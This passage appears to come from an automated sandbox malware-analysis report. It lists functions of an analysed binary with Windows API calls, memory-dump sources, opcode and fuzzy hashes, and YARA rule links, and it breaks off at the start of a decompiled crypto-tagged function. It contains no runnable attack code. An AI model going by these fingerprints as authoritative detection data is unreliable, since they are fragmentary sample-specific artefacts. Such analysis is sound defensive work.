                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,003C2989,?,00000000,?,?,00000000,00000000,777989A0), ref: 003C2A0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: 722d00e75c6bed9bb35f2a2561957e048a49e4b4683cd5eca4de119c3ad76fc1
                                                                                                    • Instruction ID: 312702398a740a5c6958746da6ff912b0f33a4aa05a683acd4a1217ac2893c54
                                                                                                    • Opcode Fuzzy Hash: 722d00e75c6bed9bb35f2a2561957e048a49e4b4683cd5eca4de119c3ad76fc1
                                                                                                    • Instruction Fuzzy Hash: 0CD0C93661421247DA715E29B844BD223DD5F10361B16445DE895CB140EF64DCC25A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B6533 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(00000000,?,003B656B), ref: 003B653E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 1de8e808010ecf3ed6ce2fbb573f579fa38f14cb085e077849f5cccd1e0ad561
                                                                                                    • Instruction ID: da30c0fa9cdd874950df6b1e58b0c5b81bc4266047e2f67dd8f5274c97027860
                                                                                                    • Opcode Fuzzy Hash: 1de8e808010ecf3ed6ce2fbb573f579fa38f14cb085e077849f5cccd1e0ad561
                                                                                                    • Instruction Fuzzy Hash: 34D01231204222479E741E3E7C495D173D85E83334722079AF4B4C31EDD3659CD34A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7322 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,003B7285,00000002,?,00000000,00000000), ref: 003B732D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: 028608e262963a64b2fb54722477b7a5d27d944ea9a26c42f69f724b92893bed
                                                                                                    • Instruction ID: a01de795b8a99c60f5613a2769ae5c5f2da073479483d98e188dfd346c83564a
                                                                                                    • Opcode Fuzzy Hash: 028608e262963a64b2fb54722477b7a5d27d944ea9a26c42f69f724b92893bed
                                                                                                    • Instruction Fuzzy Hash: 2FD01235108122478A741E3C78849C133D99A5233433B0759F8B9C31E0D7608DC766D4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B2010 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID:
                                                                                                    • API String ID: 1795875747-0
                                                                                                    • Opcode ID: 8e8133d79458da03c43a6baa032983925f4033cba3870406049f6baba3681322
                                                                                                    • Instruction ID: 0e8cbc313defe33681a91c419f372b2b25e00240560ad882c4295517bca717f7
                                                                                                    • Opcode Fuzzy Hash: 8e8133d79458da03c43a6baa032983925f4033cba3870406049f6baba3681322
                                                                                                    • Instruction Fuzzy Hash: BFD0C7361082519F97256F05EC09C87BBA5FFD5320715082FF440521605B625C25DB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B1FA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992160199-0
                                                                                                    • Opcode ID: 9f0494812ea2489b3a1060e1a064ab3f5a47fd21a154011db4c2f018e22f336c
                                                                                                    • Instruction ID: 5fee9e014252c299844f2e97582bca598f59f849867c9f772b6f51b0f91888dc
                                                                                                    • Opcode Fuzzy Hash: 9f0494812ea2489b3a1060e1a064ab3f5a47fd21a154011db4c2f018e22f336c
                                                                                                    • Instruction Fuzzy Hash: 45B092323082209BE6281A98BC0AAD07794DB09B32F2500ABF944C21909A911C924AA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7911 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?,003B793B,00000000,00000000,?,003BE4BD,?,?,?,?), ref: 003B791F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1425588814-0
                                                                                                    • Opcode ID: 9fdfb14816d7837a9a6dac72981e93e0b3e90dd0ba6b197782f90a1027c555d9
                                                                                                    • Instruction ID: 978c351fbf72e166d30573f78be2e80045498e2f8a7fd3a06cf92999d025ddfe
                                                                                                    • Opcode Fuzzy Hash: 9fdfb14816d7837a9a6dac72981e93e0b3e90dd0ba6b197782f90a1027c555d9
                                                                                                    • Instruction Fuzzy Hash: 5FC04C36158116FF8F120F70CC05C1ABBA2AB99311F10C918B255C4070DB328424EB12
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7A12 Relevance: 1.5, APIs: 1, Instructions: 6fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNELBASE(?,003B7A57,?,?,?), ref: 003B7A14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File
                                                                                                    • String ID:
                                                                                                    • API String ID: 749574446-0
                                                                                                    • Opcode ID: 1a86075081c19a32357d56e656b304b599cd81e598a81a82cfce7e0419ed8f52
                                                                                                    • Instruction ID: 7db246933df8802ed8d2a039e25ceae07546144b3ceb063e38ff14b17b68a8b4
                                                                                                    • Opcode Fuzzy Hash: 1a86075081c19a32357d56e656b304b599cd81e598a81a82cfce7e0419ed8f52
                                                                                                    • Instruction Fuzzy Hash: 27A001702A501A8A8E211B34D8099243AA1AA52606B6426A4A006CA4B4DA224819AA15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E420C Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetConsoleCtrlHandler.KERNELBASE(Function_000341EC,00000000), ref: 003E4213
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleCtrlHandler
                                                                                                    • String ID:
                                                                                                    • API String ID: 1513847179-0
                                                                                                    • Opcode ID: 5f74a9291acb3edca9872aa1967e963601921e2cf246dc1852edfe524c5d754b
                                                                                                    • Instruction ID: cc41e79da67e8b52f641f5e7b46bc09214b69bfc290a21410071a23a605a2f4f
                                                                                                    • Opcode Fuzzy Hash: 5f74a9291acb3edca9872aa1967e963601921e2cf246dc1852edfe524c5d754b
                                                                                                    • Instruction Fuzzy Hash: 30A00238B8025456DD2157B26D0AF8435346755B11F600290E102550D055902542C519
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BC099 Relevance: 1.5, APIs: 1, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 2162964266-0
                                                                                                    • Opcode ID: 67b7b9416a253877d6ab0a62bad83dc9101c8a4156183c39601dd4377ba062c2
                                                                                                    • Instruction ID: d4aab077d87b06e51ff1a53cf8e9944f8e1315fcfe1d8747cf7f6715628471bc
                                                                                                    • Opcode Fuzzy Hash: 67b7b9416a253877d6ab0a62bad83dc9101c8a4156183c39601dd4377ba062c2
                                                                                                    • Instruction Fuzzy Hash: 19816271E102099FCF36CFE8C4846EEBBB5AF48308F15986AD611BB641D771AE80CB14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EEE93 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _CxxThrowException.MSVCRT(00000000,0042FFC8), ref: 003EEEBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 432778473-0
                                                                                                    • Opcode ID: cfd9c5d3e3e9019ec040e0814d5f2a2edbf04e80c59dbbdf4720cb3d966a49c3
                                                                                                    • Instruction ID: 2390dbf5f70f9a9825ef15eb6a05eacec1e31d35eceabc0af5aa312950206c6c
                                                                                                    • Opcode Fuzzy Hash: cfd9c5d3e3e9019ec040e0814d5f2a2edbf04e80c59dbbdf4720cb3d966a49c3
                                                                                                    • Instruction Fuzzy Hash: A9F090726002549BD720AF1AD401B9EB7E99B843B6F218A2FF5A8875D0DB74A8848794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B496 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: a6b984b86d4025dad8ea2ee7849662fee0dab7662469dbff0492556a120f634b
                                                                                                    • Instruction ID: 08a205d6347383620458ca690872bf530db01965fdc0afcfb60f8f05f6714146
                                                                                                    • Opcode Fuzzy Hash: a6b984b86d4025dad8ea2ee7849662fee0dab7662469dbff0492556a120f634b
                                                                                                    • Instruction Fuzzy Hash: 37D0A9B061260101DF08C2304C0A36B2284AB5020AF18887EE816DA2C2EB3CC215828C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B3F3 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 0040B401
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 1a33d267a0396acdb5125cbeef3a7cf3f0243c42b2931f575572239fd32f9a4c
                                                                                                    • Instruction ID: 3eee98a5b5498511da67d6d0a9d0898e42ba55019a0125e0177f260f42aaf879
                                                                                                    • Opcode Fuzzy Hash: 1a33d267a0396acdb5125cbeef3a7cf3f0243c42b2931f575572239fd32f9a4c
                                                                                                    • Instruction Fuzzy Hash: A0C08CE1A4D2809FDF0213108C407603B209B83300F4A00C1E4086B092C2041C09C722
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B300 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: fc3974ee7156d88a15874a07bb157138c58c7db9e955d1ae7471686b0067ec1c
                                                                                                    • Instruction ID: c9e3c2e1e12658065630208a3c436535dfebd6514dde8eb3c64ad2bc55449bf4
                                                                                                    • Opcode Fuzzy Hash: fc3974ee7156d88a15874a07bb157138c58c7db9e955d1ae7471686b0067ec1c
                                                                                                    • Instruction Fuzzy Hash: 3EA024D473100001DD1C11353C111771000357010F7C0047D7C05C0101F73DD40C304D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B3C0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: b838fc036b3e97908aaaa1551be292f48d99c756d65e1e60f81a6ce78553bc12
                                                                                                    • Instruction ID: 2602f3046bfbd52a7d13534d5dae8d1033f88239bddd170dfcf07710d921bc85
                                                                                                    • Opcode Fuzzy Hash: b838fc036b3e97908aaaa1551be292f48d99c756d65e1e60f81a6ce78553bc12
                                                                                                    • Instruction Fuzzy Hash: 20A012CCE1000001D90410352801163102275F050D7D4C4796C0480105FB3CC418304D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B413 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0040B41C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: 6a44d941cea36033ff756a31e89ca290066ea98778581f9fe9043857fb20c6d6
                                                                                                    • Instruction ID: 5d185090f9982b22a7db4d1850512110cea8fc697a5d5f0bf3e2b5ddad4c41e8
                                                                                                    • Opcode Fuzzy Hash: 6a44d941cea36033ff756a31e89ca290066ea98778581f9fe9043857fb20c6d6
                                                                                                    • Instruction Fuzzy Hash: 33A0027878070476EDB067306D4FF5937347781F41F7085547245690D05AE47445DA1C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B320 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: a90df977d088e559b5a3ac096065e4e608ea07d1065a4237869f9109acf530e5
                                                                                                    • Instruction ID: 69729678a09c17625f91ab0d58f356cedf9d9577c571618c28c87294ec5b4b3d
                                                                                                    • Opcode Fuzzy Hash: a90df977d088e559b5a3ac096065e4e608ea07d1065a4237869f9109acf530e5
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B3E0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 6556b2eae512d4ea31c455de01abe10921b699777217d18599bb46ef90935db4
                                                                                                    • Instruction ID: 2b0250cdf210075c998340eda0836a92ba6e76ecf8642d72217010054e82c98c
                                                                                                    • Opcode Fuzzy Hash: 6556b2eae512d4ea31c455de01abe10921b699777217d18599bb46ef90935db4
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B1E40 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: e06e042bed3e9fe98e6f1b9c96442c263657c26960d6e51779fa2ab3bdcc2237
                                                                                                    • Instruction ID: f8b5c4dec3e65577dc6bbf60b35bd8dc1c763a96d138c9d6dd45263f3e0e5e96
                                                                                                    • Opcode Fuzzy Hash: e06e042bed3e9fe98e6f1b9c96442c263657c26960d6e51779fa2ab3bdcc2237
                                                                                                    • Instruction Fuzzy Hash: 61A00271105102DBDA151B11ED0D4D97B61EB84623F6044A9F087404708F314D71FA05
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 003CA8A6 Relevance: 90.0, APIs: 6, Strings: 44, Instructions: 2537COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E003CA8A6(signed int __ecx, char* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t1109;
				unsigned int _t1110;
				char _t1111;
